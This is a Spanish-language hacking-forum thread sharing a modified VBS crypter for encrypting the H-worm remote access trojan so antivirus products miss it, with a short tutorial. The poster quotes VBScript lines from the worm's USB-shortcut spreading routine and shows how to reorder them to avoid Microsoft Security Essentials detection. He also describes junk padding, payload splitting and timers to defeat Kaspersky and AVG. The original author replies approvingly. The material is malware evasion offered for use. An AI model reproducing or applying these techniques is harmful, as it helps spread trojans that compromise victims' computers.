• Cactus VBS Crypter by MadAntrax (mod Titan) + mini tuto

  • Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
 #441129  por TITAN
 14 Abr 2014, 06:44
Gente aca les dejo esta joya que codeo MadAntrax le modifique un poco el code para que no sea detectado, encripta perfectamente el server de h-worm quedando un servidor de aprox 60kb. de acuerdo al scan es detectado por Trend Micro, pero no estoy seguro ya que no lo tengo instalado y sospecho que puede ser un error.

Nota1: Segun experimentos que hice en forma local security essentials no lo detecta a no ser que en la configuracion del servidor hayamos activado la funcion spread, en ese caso hay que modificar unas lineas en el servidor antes de encriptar, le muestro que es lo que se modifica para que no sea detectado por essentials cuando genera los accesos directos en la funcion spread

busquen estas lineas en el server h-worm

antes... funcion spread de archivos
Código: [ Debe registrarse para ver este enlace ]
"/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
asi debe quedar...
Código: [ Debe registrarse para ver este enlace ]
"/c start " & replace(file.name," ", chrw(34) & " " & chrw(34)) & "&start " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
Mas abajo en el servidor esta el spread por carpetas hacen lo mismo remplazan siguiendo el mismo criterio.....
espero entiendan....la funcion spread lo que hace es generar un acceso directo por cada archivo que esta en el extraible usb y ejecuta 1ro el vbs y luego el archivo en cuestion, cambiando estas lineas de codigo primero se ejecutaria el archivo y luego el server script

Nota2: pueden agregar basura en el server antes de encriptar tambien probe combinaciones por ejemplo partir el servidor en 2 y encriptar en forma independiente luego unir los dos encriptados en un solo archivo solido, los que entienden un poco de script se daran cuenta.

Al encriptador le agregue basura y algunos temporizadores para engañar a los AV es el caso de kas, avg
Espero lo difruten, todo el credito para MadAntrax por codear esta maravilla.
Saludos!!




Descarga aqui [ Debe registrarse para ver este enlace ] >>> reupload 11-03-18

scan realizado por el amigo otroyomismo [ Debe registrarse para ver este enlace ]

El pass : ***Mucho Cuidado con esto***

PD no me hago responsable del mal uso de esta herramienta jaja. No me llenen de MP
 #441143  por MadAntrax
 14 Abr 2014, 12:26
Bieeen, el primer mod de mi herramienta. Éstos son los motivos que me animan a publicar los sources :)

Tengo en el horno la versión 2.0 del crypter. Si quieres me pasas el mod y lo añado antes de publicarlo.

Saludos y buen trabajo